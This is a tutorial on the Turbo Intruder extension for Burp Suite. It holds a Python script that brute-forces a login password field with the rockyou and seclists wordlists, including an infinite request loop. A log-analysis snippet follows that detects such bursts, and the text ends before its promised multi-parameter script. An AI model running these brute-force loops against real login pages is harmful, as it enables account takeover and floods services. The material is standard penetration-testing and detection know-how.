
Turbo Intruder in Burp Suite

Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests, used for brute forcing and fuzzing web applications.

Using Single Parameter

Put "%s" where the payload should be inserted in the request. For example, setting %s as the value of the password parameter makes each queued payload a candidate password.

POST /login HTTP/1.1
...

username=admin&password=%s

Here is the Python cheat sheet. The loops inside queueRequests are alternatives; use whichever fits the situation.

# RequestEngine and table are provided by Turbo Intruder at runtime.
# target.req is the request template containing %s; wordlists is unused here.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=5,
                           pipeline=False
                           )

    # The loops below are alternatives; keep only the one you need.

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255); the upper bound is exclusive, so 256 is needed to include 255
    for i in range(0, 256):
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop): i is never incremented, so the unmodified
    # request is queued until the attack is stopped manually
    i = 0
    while i < 1:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    # Only responses Turbo Intruder marks as interesting are added to the results table
    if interesting:
        table.add(req)
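A script like the one above produces a burst of POST /login requests from a single client, which is the pattern a defender can look for in access logs. The following Python snippet is an added example, not part of the original cheat sheet: it scans constructed combined-format log lines and flags clients that exceed a threshold of login POSTs inside a sliding window. The log format, threshold and window size are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse_line(line):
    """Return (ip, datetime, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect_login_bruteforce(lines, path="/login", threshold=10, window_seconds=60):
    """Flag client IPs that POST to `path` more than `threshold` times within any
    `window_seconds` window. Returns {ip: peak_count} for flagged clients only."""
    windows = defaultdict(deque)   # ip -> timestamps of recent login POSTs (per-client order matters)
    peak = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, req_path, _status = parsed
        if method != "POST" or req_path != path:
            continue
        q = windows[ip]
        q.append(ts)
        # drop timestamps that have fallen out of the sliding window
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n > threshold}

def make_sample_log():
    """Constructed sample: one client hammering /login (12 failed POSTs in 22 s),
    one normal user who loads the form and logs in once."""
    attacker = ['203.0.113.5 - - [10/Oct/2023:13:55:%02d +0000] "POST /login HTTP/1.1" 401 230' % s
                for s in range(0, 24, 2)]
    normal = ['198.51.100.7 - - [10/Oct/2023:13:55:10 +0000] "GET /login HTTP/1.1" 200 1024',
              '198.51.100.7 - - [10/Oct/2023:13:55:15 +0000] "POST /login HTTP/1.1" 302 0']
    return attacker + normal

if __name__ == "__main__":
    print(detect_login_bruteforce(make_sample_log()))   # {'203.0.113.5': 12}
```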

Using Multiple Parameters

Beyond a single parameter, we can attack multiple parameters at once, e.g. username and password.

Here is the Python script. Each parameter needs its own set of words, as below.
